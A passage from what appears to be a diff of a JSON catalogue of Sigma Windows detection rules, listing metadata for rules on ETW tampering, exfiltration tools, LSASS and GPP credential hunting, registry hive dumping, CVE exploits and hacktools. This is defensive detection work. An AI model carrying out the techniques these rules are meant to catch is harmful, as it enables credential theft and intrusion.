"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_modification_cmdline.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ], - "creation_date": "2020/05/02", - "filename": "proc_creation_win_etw_modification_cmdline.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a command that clears or disables any ETW trace log which could indicate a logging evasion.", - "uuid": "a238b5d0-ce2d-4414-a676-7a531b3d13d6", - "value": "Disable of ETW Trace", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", - "https://abuse.io/lockergoga.txt", - "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_etw_trace_evasion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1562.006", - "car.2016-04-002" - ], - "creation_date": "2019/03/22", - "filename": "proc_creation_win_etw_trace_evasion.yml", - "author": "@neu5ron, Florian Roth, Jonhnathan Ribeiro, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.", - "uuid": "a197e378-d31b-41c0-9635-cfdf1c1bb423", - "value": "WinRM Access with Evil-WinRM", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm", - "https://github.com/Hackplayers/evil-winrm", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_evil_winrm.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.006" - ], - "creation_date": "2022/01/07", - "filename": "proc_creation_win_evil_winrm.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects execution via MSSQL xp_cmdshell stored procedure. Malicious users may attempt to elevate their privileges by using xp_cmdshell, which is disabled by default.", - "uuid": "344482e4-a477-436c-aa70-7536d18a48c7", - "value": "Execution via MSSQL Xp_cmdshell Stored Procedure", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/execution-via-mssql-xp_cmdshell-stored-procedure.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/09/28", - "filename": "proc_creation_win_execution_mssql_xp_cmdshell_stored_procedure.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Execution of well known tools for data exfiltration and tunneling", - "uuid": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", - "value": "Exfiltration and Tunneling Tools Execution", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1041", - "attack.t1572", - "attack.t1071.001" - ], - "creation_date": "2019/10/24", - "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate Administrator using tools" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of various cli utility related to web request exfiltrating data", - "uuid": "7d1aaf3d-4304-425c-b7c3-162055e0b3ab", - "value": "Possible Exfiltration Of Data Via CLI", - "meta": { - "refs": [ - "https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exfil_data_via_cli.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2022/08/02", - "filename": "proc_creation_win_exfil_data_via_cli.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries can use the inbuilt expand utility to decompress cab files as seen in recent Iranian MeteorExpress attack", - "uuid": "9f107a84-532c-41af-b005-8d12a607639f", - "value": "Cabinet File Expansion", - "meta": { - "refs": [ - "https://labs.sentinelone.com/meteorexpress-mysterious-wiper-paralyzes-iranian-trains-with-epic-troll", - "https://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_expand_cabinet_files.yml" - ], - "tags": [ - "attack.execution", - "attack.t1218" - ], - "creation_date": "2021/07/30", - "filename": "proc_creation_win_expand_cabinet_files.yml", - "author": "Bhabesh Raj", - "level": "medium", - "falsepositive": [ - "System administrator Usage" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Winword starting uncommon sub process MicroScMgmt.exe as used in exploits for CVE-2015-1641", - "uuid": "7993792c-5ce2-4475-a3db-a3a5539827ef", - "value": "Exploit for CVE-2015-1641", - "meta": { - "refs": [ - "https://www.virustotal.com/en/file/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8/analysis/", - "https://www.hybrid-analysis.com/sample/5567408950b744c4e846ba8ae726883cb15268a539f3bb21758a466e47021ae8?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2015_1641.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036.005" - ], - "creation_date": "2018/02/22", - "filename": "proc_creation_win_exploit_cve_2015_1641.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Winword starting uncommon sub process FLTLDR.exe as used in exploits for CVE-2017-0261 and CVE-2017-0262", - "uuid": "864403a1-36c9-40a2-a982-4c9a45f7d833", - "value": "Exploit for CVE-2017-0261", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/05/eps-processing-zero-days.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_0261.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" - ], - "creation_date": "2018/02/22", - "filename": "proc_creation_win_exploit_cve_2017_0261.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Several false positives identified, check for suspicious file names or locations (e.g. Temp folders)" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", - "uuid": "678eb5f4-8597-4be6-8be7-905e4234b53a", - "value": "Droppers Exploiting CVE-2017-11882", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/2a4ae284c76f868fc51d3bb65da8caa6efacb707f265b25c30f34250b76b7507?environmentId=100", - "https://www.google.com/url?hl=en&q=https://embedi.com/blog/skeleton-closet-ms-office-vulnerability-you-didnt-know-about&source=gmail&ust=1511481120837000&usg=AFQjCNGdL7gVwLXaNSl2Td8ylDYbSJFmPw", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_11882.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" - ], - "creation_date": "2017/11/23", - "filename": "proc_creation_win_exploit_cve_2017_11882.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", - "uuid": "fdd84c68-a1f6-47c9-9477-920584f94905", - "value": "Exploit for CVE-2017-8759", - "meta": { - "refs": [ - "https://www.hybrid-analysis.com/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", - "https://www.reverse.it/sample/0b4ef455e385b750d9f90749f1467eaf00e46e8d6c2885c260e1b78211a51684?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2017_8759.yml" - ], - "tags": [ - "attack.execution", - "attack.t1203", - "attack.t1204.002", - "attack.initial_access", - "attack.t1566.001" - ], - "creation_date": "2017/09/15", - "filename": "proc_creation_win_exploit_cve_2017_8759.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects exploitation attempt of privilege escalation vulnerability via SetupComplete.cmd and PartnerSetupComplete.cmd described in CVE-2019-1378", - "uuid": "1c373b6d-76ce-4553-997d-8c1da9a6b5f5", - "value": "Exploiting SetupComplete.cmd CVE-2019-1378", - "meta": { - "refs": [ - "https://www.embercybersecurity.com/blog/cve-2019-1378-exploiting-an-access-control-privilege-escalation-vulnerability-in-windows-10-update-assistant-wua", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1378.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068", - "attack.execution", - "attack.t1059.003", - "attack.t1574", - "cve.2019.1378" - ], - "creation_date": "2019/11/15", - "filename": "proc_creation_win_exploit_cve_2019_1378.yml", - "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects an exploitation attempt in which the UAC consent dialogue is used to invoke an Internet Explorer process running as LOCAL_SYSTEM", - "uuid": "02e0b2ea-a597-428e-b04a-af6a1a403e5c", - "value": "Exploiting CVE-2019-1388", - "meta": { - "refs": [ - "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-1388", - "https://www.zerodayinitiative.com/blog/2019/11/19/thanksgiving-treat-easy-as-pie-windows-7-secure-desktop-escalation-of-privilege", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2019_1388.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ], - "creation_date": "2019/11/20", - "filename": "proc_creation_win_exploit_cve_2019_1388.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", - "uuid": "846b866e-2a57-46ee-8e16-85fa92759be7", - "value": "Exploited CVE-2020-10189 Zoho ManageEngine", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", - "https://vulmon.com/exploitdetails?qidtp=exploitdb&qid=48224", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_10189.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1059.001", - "attack.t1059.003", - "attack.s0190", - "cve.2020.10189" - ], - "creation_date": "2020/03/25", - "filename": "proc_creation_win_exploit_cve_2020_10189.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects new commands that add new printer port which point to suspicious file", - "uuid": "cc08d590-8b90-413a-aff6-31d1a99678d7", - "value": "Suspicious PrinterPorts Creation (CVE-2020-1048)", - "meta": { - "refs": [ - "https://windows-internals.com/printdemon-cve-2020-1048/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1048.yml" - ], - "tags": [ - "attack.persistence", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2020/05/13", - "filename": "proc_creation_win_exploit_cve_2020_1048.yml", - "author": "EagleEye Team, Florian Roth", - "level": "high", - "falsepositive": [ - "New printer port install on host" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects exploitation of DNS RCE bug reported in CVE-2020-1350 by the detection of suspicious sub process", - "uuid": "b5281f31-f9cc-4d0d-95d0-45b91c45b487", - "value": "DNS RCE CVE-2020-1350", - "meta": { - "refs": [ - "https://research.checkpoint.com/2020/resolving-your-way-into-domain-admin-exploiting-a-17-year-old-bug-in-windows-dns-servers/", - "https://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_cve_2020_1350.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2020/07/15", - "filename": "proc_creation_win_exploit_cve_2020_1350.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown but benign sub processes of the Windows DNS service dns.exe" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects signs of the exploitation of LPE CVE-2021-41379 to spawn a cmd.exe with LOCAL_SYSTEM rights", - "uuid": "af8bbce4-f751-46b4-8d91-82a33a736f61", - "value": "Possible InstallerFileTakeOver LPE CVE-2021-41379", - "meta": { - "refs": [ - "https://github.com/klinix5/InstallerFileTakeOver", - "https://www.zerodayinitiative.com/advisories/ZDI-21-1308/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_lpe_cve_2021_41379.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ], - "creation_date": "2021/11/22", - "filename": "proc_creation_win_exploit_lpe_cve_2021_41379.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the exploitation of PrinterNightmare to get a shell as LOCAL_SYSTEM", - "uuid": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", - "value": "SystemNightmare Exploitation Script Execution", - "meta": { - "refs": [ - "https://github.com/GossiTheDog/SystemNightmare", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_exploit_systemnightmare.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1068" - ], - "creation_date": "2021/08/11", - "filename": "proc_creation_win_exploit_systemnightmare.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Rename as a legitimate Sysinternals Suite tool to evade detection", - "uuid": "7cce6fc8-a07f-4d84-a53e-96e1879843c9", - "value": "False Sysinternals Suite Tools", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_false_sysinternalsuite.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" - ], - "creation_date": "2021/12/20", - "filename": "proc_creation_win_false_sysinternalsuite.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects a file or folder's permissions being modified or tampered with.", - "uuid": "37ae075c-271b-459b-8d7b-55ad5f993dd8", - "value": "File or Folder Permissions Modifications", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1222.001/T1222.001.md", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh750728(v=ws.11)", - "https://github.com/swagkarna/Defeat-Defender-V1.2.0", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_file_permission_modifications.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1222.001" - ], - "creation_date": "2019/10/23", - "filename": "proc_creation_win_file_permission_modifications.yml", - "author": "Jakob Weinzettl, oscd.community, Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Users interacting with the files on their own (unlikely unless privileged users).", - "Dynatrace app" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Look for the encrypted cpassword value within Group Policy Preference files on the Domain Controller. This value can be decrypted with gpp-decrypt.", - "uuid": "91a2c315-9ee6-4052-a853-6f6a8238f90d", - "value": "Findstr GPP Passwords", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.006/T1552.006.md#atomic-test-1---gpp-passwords-findstr", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_gpp_passwords.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ], - "creation_date": "2021/12/27", - "filename": "proc_creation_win_findstr_gpp_passwords.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID", - "uuid": "fe63010f-8823-4864-a96b-a7b4a0f7b929", - "value": "Findstr LSASS", - "meta": { - "refs": [ - "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ], - "creation_date": "2022/08/12", - "filename": "proc_creation_win_findstr_lsass.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of findstr with the \"EVERYONE\" keyword. This is often used in combination with icacls to look for misconfigured files or folders permissions", - "uuid": "47e4bab7-c626-47dc-967b-255608c9a920", - "value": "Suspicious Recon Activity Using Findstr Keywords", - "meta": { - "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_findstr_recon_everyone.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.006" - ], - "creation_date": "2022/08/12", - "filename": "proc_creation_win_findstr_recon_everyone.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects attempts to disable the Windows Firewall using PowerShell", - "uuid": "12f6b752-042d-483e-bf9c-915a6d06ad75", - "value": "Windows Firewall Disabled via PowerShell", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_firewall_disabled_via_powershell.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ], - "creation_date": "2022/09/14", - "filename": "proc_creation_win_firewall_disabled_via_powershell.yml", - "author": "Tim Rauch", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Fast Reverse Proxy. frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", - "uuid": "32410e29-5f94-4568-b6a3-d91a8adad863", - "value": "Fast Reverse Proxy (FRP)", - "meta": { - "refs": [ - "https://asec.ahnlab.com/en/38156/", - "https://github.com/fatedier/frp", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_frp.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090" - ], - "creation_date": "2022/09/02", - "filename": "proc_creation_win_frp.yml", - "author": "frack113, Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Attackers may leverage fsutil to enumerated connected drives.", - "uuid": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", - "value": "Fsutil Drive Enumeration", - "meta": { - "refs": [ - "Turla has used fsutil fsinfo drives to list connected drives. https://attack.mitre.org/techniques/T1120/", - "https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/discovery_peripheral_device.toml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_drive_enumeration.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1120" - ], - "creation_date": "2022/03/29", - "filename": "proc_creation_win_fsutil_drive_enumeration.yml", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", - "level": "low", - "falsepositive": [ - "Certain software or administrative tasks may trigger false positives." - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", - "uuid": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", - "value": "Fsutil Behavior Set SymlinkEvaluation", - "meta": { - "refs": [ - "https://www.cybereason.com/blog/cybereason-vs.-blackcat-ransomware", - "https://docs.microsoft.com/fr-fr/windows-server/administration/windows-commands/fsutil-behavior", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_fsutil_symlinkevaluation.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059" - ], - "creation_date": "2022/03/02", - "filename": "proc_creation_win_fsutil_symlinkevaluation.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet", - "uuid": "c8a180d6-47a3-4345-a609-53f9c3d834fc", - "value": "Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet", - "meta": { - "refs": [ - "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_get_localgroup_member_recon.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.001" - ], - "creation_date": "2022/10/10", - "filename": "proc_creation_win_get_localgroup_member_recon.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Administrative activity" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the execution GMER tool based on image and hash fields.", - "uuid": "9082ff1f-88ab-4678-a3cc-5bcff99fc74d", - "value": "GMER - Rootkit Detector and Remover Execution", - "meta": { - "refs": [ - "http://www.gmer.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gmer_execution.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/10/05", - "filename": "proc_creation_win_gmer_execution.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", - "uuid": "b6d98a4f-cef0-4abf-bbf6-24132854a83d", - "value": "Use of GoToAssist Remote Access Software", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gotoopener.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/02/13", - "filename": "proc_creation_win_gotoopener.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", - "uuid": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", - "value": "Gpg4Win Decrypt Files From Suspicious Locations", - "meta": { - "refs": [ - "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gpg4win_susp_usage.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1219" - ], - "creation_date": "2022/11/30", - "filename": "proc_creation_win_gpg4win_susp_usage.yml", - "author": "Nasreddine Bencherchali, X__Junior", - "level": "medium", - "falsepositive": [ - "Legitimate use" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Dump sam, system or security hives using REG.exe utility", - "uuid": "fd877b94-9bb5-4191-bb25-d79cbd93c167", - "value": "Grabbing Sensitive Hives via Reg Utility", - "meta": { - "refs": [ - "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", - "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", - "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_grabbing_sensitive_hives_via_reg.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002", - "attack.t1003.004", - "attack.t1003.005", - "car.2013-07-001" - ], - "creation_date": "2019/10/22", - "filename": "proc_creation_win_grabbing_sensitive_hives_via_reg.yml", - "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Windows hacktools based on their import hash (imphash) even if the files have been renamed", - "uuid": "24e3e58a-646b-4b50-adef-02ef935b9fc8", - "value": "Windows Hacktool Imphash", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hacktool_imphashes.yml" - ], - "tags": "No established tags", - "creation_date": "2022/03/04", - "filename": "proc_creation_win_hacktool_imphashes.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate use of one of these tools" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects command line parameters used by ADCSPwn, a tool to escalate privileges in an active directory network by coercing authenticate from machine accounts and relaying to the certificate service", - "uuid": "cd8c163e-a19b-402e-bdd5-419ff5859f12", - "value": "ADCSPwn Hack Tool", - "meta": { - "refs": [ - "https://github.com/bats3c/ADCSPwn", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_adcspwn.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1557.001" - ], - "creation_date": "2021/07/31", - "filename": "proc_creation_win_hack_adcspwn.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", - "uuid": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", - "value": "Bloodhound and Sharphound Hack Tool", - "meta": { - "refs": [ - "https://github.com/BloodHoundAD/BloodHound", - "https://github.com/BloodHoundAD/SharpHound", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_bloodhound.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.001", - "attack.t1069.002", - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/12/20", - "filename": "proc_creation_win_hack_bloodhound.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Other programs that use these command line option and accepts an 'All' parameter" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of tools created by a well-known hacktool producer named Cube0x0, which includes his handle in all binaries as company information in the PE headers (SharpPrintNightmare, KrbRelay, SharpMapExec etc.)", - "uuid": "37c1333a-a0db-48be-b64b-7393b2386e3b", - "value": "Hacktool by Cube0x0", - "meta": { - "refs": [ - "https://github.com/cube0x0", - "https://www.virustotal.com/gui/search/metadata%253ACube0x0/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_cube0x0_tools.yml" - ], - "tags": "No established tags", - "creation_date": "2022/04/27", - "filename": "proc_creation_win_hack_cube0x0_tools.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "process_creation", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of Dumpert process dumper, which 